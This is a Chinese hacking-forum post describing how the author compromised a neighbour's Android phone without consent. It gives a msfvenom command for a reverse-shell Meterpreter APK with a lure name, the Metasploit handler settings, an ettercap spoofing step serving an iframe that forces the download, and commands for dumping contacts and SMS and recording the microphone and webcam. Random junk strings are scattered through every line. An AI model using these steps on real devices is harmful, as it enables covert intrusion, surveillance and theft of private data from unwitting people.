中国网络渗透测试联盟

标题: metasploit+ettercap中间人攻击成功入侵邻居手机 [打印本页]

作者: admin    时间: 2018-10-20 20:30
标题: metasploit+ettercap中间人攻击成功入侵邻居手机

+ {3 f9 M7 x" p 五、msf+ettercap入侵邻居安卓手机 8 J( W, o F ?( l. \* J3 R F' h

" S! n5 C. N+ D4 j7 Z

" b1 Q+ p! u0 I, A) M9 e 首先启动msf 9 ]; O. C$ P1 E2 s* a1 u

; O7 K$ m) s) Q, o

0 v5 u, [, i# \0 O1 Q3 i8 L/ |4 b 先用kali生成一个安卓木马,如下命令: , Z, u( B5 K) j8 @+ g1 Y1 a

- Q) D, o; {% F/ q

$ N$ i1 s9 m) ` Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk & x. k9 D5 p) k

% N/ |% Y) _) G/ `* w9 s& _

3 k6 |" q" j' \* B2 V' O( J 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”,就不适用替换下载的方法了,据我所知,邻居频繁使用手机浏览器浏览新闻 , u9 d& ~8 @/ C7 w9 p- Q

6 v' r+ [1 I, q6 B# t+ m

: `; V' T# F, P. \" W4 i4 [ 然后进入msf 0 e! I) r: Y8 O) g2 I

$ q2 C2 A0 V) z6 e' s

5 U! A* J" V K# B use exploit/multi/handler - B9 T3 V$ K% B8 p& \3 Y( F

9 U7 P, w6 a. J7 L. b+ m

8 L! a1 Y: k- } ^) ]% u! q' R( k set payload android/meterpreter/reverse_tcp 6 P1 w' `) Y3 \# s( [

q2 q8 r9 V$ y/ p% m$ n

; W6 z% j$ a& s; E& D set LHOST 192.168.0.109 //ipkailiip # Z1 F. Q5 j. M9 k* s7 m& d& K

3 s. ]' a9 l5 `) w* X

. a7 h% E: w/ U0 g set LPORT 44444 //端口一定要与前面生成的木马的端口一致 - a" ]4 a7 _/ p0 _/ T# S

# h+ g/ k: w& e6 N

, o8 N: q F7 E7 _- P/ V- {) w Exploit $ ^7 z" ]$ q& L5 M& h: g# {

$ v4 B2 N P, ^

$ L# \( ]( v/ A, r1 N   ( O* y. }7 v" d: s8 V; L2 X

) [2 q# ?" Y: H# M

) x) u1 {4 S8 b$ x O- r 下面我们开启ettercap -G ( p7 o( P3 b( q% F4 `" I. Q

& N3 N! a* ~! A* W! c4 K9 Z* z

, m, ]2 B h* B! |5 q 我物理IP 3 ~+ e# u7 o$ N7 W2 ^- A5 y' z; F# c) C

9 [% F- f9 z% Z& [

+ s- Z, u+ r X* h$ k   6 j# a( C& g5 e7 h

6 P' q% n5 P. m3 ?

9 P- c. J" N3 n 别到时候再把我物理机欺骗了,之前测试物理机只装腾讯管家是可以成功欺骗的, + y" t0 S( s- m' d- ]/ ?9 m

( S( L/ K9 U( w5 j

$ D* i' |. h' d- a+ w% k( s4 | 下面我们来设置一下 ; d+ S6 U6 z( a8 m/ l2 `1 A" ~* Y

3 I; K/ r8 s" l. [$ L6 `. K

5 M5 T. I% ], U0 ]   8 ?# S: o: J: `1 e- b8 K

8 s; r& d5 Z; P

) x; s: M j0 g7 N/ L0 C! Z ^3 D 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下,并创建一个index.htm文件内容为:<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载,用iframe语句就OK了, $ ~* `' g' Q; x( I( ^# C9 E& ~

, ~+ G! S" l& }" K% B- }6 d

5 J: U6 D- v0 F6 g) p1 V( N   " ~+ b* n5 Y* u: t

& g o5 z2 c! G5 ]

1 L- t2 C) S6 _   % h6 S' z* t9 h6 g) F

1 Y* s* s; n0 F% f7 A9 i/ P% M4 Y

# x/ t% O9 I8 r# c: T   . x7 s# X: P8 W7 F5 Y

) g6 H* m* D6 {$ r; v' {

6 E/ j) h+ `% Q% a/ E- K/ \   ) `, I- x, I7 w+ d( ?1 p5 j

: _& k2 a. x+ f

* T- Z4 E7 _. F1 W: R/ `   4 q+ b4 K1 j* x

4 M4 d# Z# E8 E1 S9 j

9 z/ o! ?5 b# D, i/ Z. u/ x2 _   1 I1 D# g; c: B0 s+ s& a# k" v

) e& V: b4 {7 ~9 W

* F0 e3 U2 m/ }3 v$ ?# v/ _/ H   5 A& C; g0 o7 V0 z# u

8 a+ V8 L0 j, m, J) u5 l- Y

' z2 u( k4 V; O2 {8 \0 W6 R& n   % t1 j6 h9 j h7 X' R/ f

5 u/ M( I; v. U8 M2 ^$ a: n. f8 U

) b* n% e7 G4 t4 K# C, C0 e c   ' w# y- T& {+ L% c- e( ?4 v3 p

7 b) \9 v, f( @- P7 w! H

$ D: k" A: ^, p   ; [3 K ?- R7 ^$ \) W8 z- p$ r

% q" j4 x* U! e3 U$ M

0 ^8 e& a# R T& [ L   & o. {3 f& |2 S+ F% S# F$ o

2 A9 u. O" W6 u, B

. ?, k. m2 e U5 [* M8 }5 X. g9 _   6 Q' c$ l/ [% |: U7 `5 O

/ [6 ~, Y5 d' A2 p, t) ^

- h P. Q* D1 s: V: X- e   / N( g! w* i& j" A6 p

1 |( K0 l9 r5 H& }% s, G1 b

4 I2 s, k* d# p) p 下面我们开始攻击 / B1 D* ^& }' p

7 ?7 @4 l, L, w, b( B! x1 H

; `: n9 `( { Q; g( r   7 c3 `: H# o( m3 k$ m8 _) ]

& c5 j+ z- @4 X

. G$ ]+ g- A0 {   ; V: U# r7 ^. ]4 r5 X9 R9 \# Y

$ G& Z/ a3 |5 f1 q

1 t: f1 g8 z9 ` V   2 V% T8 T6 g4 A' t6 y7 C% R; b

0 l: r [) v$ x) m

" f2 i8 r3 x: E+ X) Z4 J   6 D! V; g2 U. G5 `6 l- w

% x5 s) K0 G' `/ x. T

: W. o" ` e. {8 x   8 Z$ x. o* O' b9 _

7 j3 |8 y7 q9 U' \* Z, A6 o

8 U3 V) l. N/ C) ?6 z) `! y 大概过了5分钟多,发现反弹成功了 4 u; S5 _& r8 A0 a$ q

}$ B! |2 q: k) {/ N" [+ [, i

) z4 u9 g" Q5 J0 {4 c: F   3 `/ o T' Q d& v

[' A: a+ l4 z, r' b0 V. B: G

4 x+ n. y, _! z! C6 G4 Z* l   : h) s4 T4 R1 J

- w2 M: M1 T/ V' }, ~( y

9 \6 P5 q! _: a/ p   . \, J/ n6 I- {

' w# E/ K& O- Z9 \3 y; S

7 Y8 p$ C F+ g4 K: `4 X   # I( p- z9 D: [% P

N; G" I4 h0 f5 i! S0 G

# F. O' _- ~0 Q$ O4 B; N3 o   ) I! |7 `0 N* e0 {1 Q

/ b4 i Y2 q2 L

" J% k: n5 m+ A; f: D2 p   * `: [6 q; `# V$ v, A! A

3 V( s- v: u8 E8 |! n- |

9 [; C8 A1 C3 l# f) A; e   0 G1 [( w1 q' R6 `" q& a" U- v, N

0 i7 Y5 U I- \" n; L+ A

5 _& h% K H4 }% ?' O$ T! I' t 执行命令 # f: T' z" Q' \& y3 t9 \

; a, ^/ ^2 b0 i" b$ j; |

4 M* y* n; H6 k9 T2 p   ! S. f& c6 Z: C- E$ G9 |8 X

. M- \, Y L5 z$ g& V3 A

7 O1 P4 Z+ y: x: s dump_contacts    --》这个是导出电话 7 N& j4 u+ i$ q/ {

2 j. l" b! ]) r! C# C/ J

# e$ r# d" m& r p) n dump_sms --》这个是导出信息 ( S( }1 |, | Z) q* p

/ w* R' A2 F; _; c7 |7 Q" Q

* ~% \$ f& j9 l. z; W- u" y record_mic     Record audio from the default microphone for X seconds ; Z1 A9 Q7 [* ~2 [6 N$ R

7 j" e6 \/ [: S0 l, ~

/ G: j/ ^5 t% L8 b' M( D$ T     webcam_chat    Start a video chat 3 {# `- M P' n* ~ I

" ?9 k. D4 ?2 a' K4 _; ~- y

3 m/ S. [9 I1 s* C+ `% J( G     webcam_list    List webcams $ E) X0 M9 W3 H" H0 l/ O

" B- x6 e, a& e" n p! F+ _7 h

, r% _2 i& _% |. p! I; N& K     webcam_snap    Take a snapshot from the specified webcam ' I3 ]! A$ D8 p5 k

- E, D5 N6 O3 T' x

c" g5 F0 `/ A# l+ R webcam_stream  lay a video stream from the specified webcam 4 x* x! ~" x) u3 Y, M

) e; C( t+ K* j; C: u6 Z

% d$ v7 ~0 s. ^+ j0 [8 _) L   " K8 s' Y1 T7 }, y

, H4 U( ?7 b* @# s

. B% _' s; i2 Z) W   4 Q( u: ~6 k9 H: g; [& j% k

" ?0 M/ K$ ?! c. _& \

+ R& J. _. v6 l" x' n/ [ 我们打开看一下电话薄, " h6 u6 E/ W, o4 f+ B7 d

- T6 O2 t0 t; \4 U4 V" E! J) C

% v" p1 k" L3 E, j" H1 [5 h% }   9 e' Y9 u. \0 v5 h; `$ W* r' Q

" J! `& w. X! v; Z4 m

$ p. W0 t, h& U& f1 u. O2 V; F A   ( r6 f+ z) A* y% |, ^

) G" \' `& f# S

) j7 y9 q! H* z! E   $ G) X9 I' Q8 D' x% x

0 i6 l& @" Y2 e9 T3 E8 u% K

( j! ~! E( D& o+ J. D   6 m2 F. F+ [$ b! K3 u8 E8 b/ [

+ ^% L# B7 S7 E9 u7 O6 S5 U" W0 q, y0 E

. i5 }/ W& M8 D: m( s5 Q   h ]0 X6 H/ A9 T

5 }+ H, ?. i+ [ w8 w7 L) {1 f

* I8 O: Y* `+ B# U5 F, k   ( }" | K% m: T1 m

" v6 v& S' L9 o3 h

- A5 S% Y+ S3 y 我们同时欺骗成DroidJack木马,使用方法如图: & s) L6 G% ]+ n3 `" @

2 d/ @# Y: P2 \1 D

. e/ t" D7 P: k p* B) n   8 H; [/ u ^6 {8 M, x* b

: L, Q) ^! ], F9 y

, W& A" U; ? G- s$ }! S   % b( ]3 d# c! H7 s

; L9 D1 m+ d# [$ U1 U. E& f

8 g9 D* i5 |1 ^& y& h* e( j   0 F# n2 l) p: t- q

) X7 F0 K6 U3 @/ \

1 R9 d0 Y' l t& }! S" M9 u 切记在前面生成完马以后记得在这里选择开关为on,并且对应前面生成马的时候的端口 # w- I8 m+ g2 w

& |: P0 F) S: A: J1 D& s ?; B

- u$ V X3 z+ X0 z& |8 K   ; h8 ]0 Z) ]$ }" w2 m; Y

: u- f& O& }4 b- G- }$ t

! |# ~0 e# |2 L F   5 Z! {, d* U2 E

8 Q. b, z: x6 e! ^

# O, n; a* ]( c! G5 r   . z K; M7 W4 t) B( q/ h" V

% d; a. J* I/ V0 n

1 y, ~2 E2 g+ n; m) w 8 w X# x2 m% G; w( J

, E; N: B; ^1 G) d2 M

" `! A7 U0 u/ M
5 ?* I$ T& e& t, n3 T! k






欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2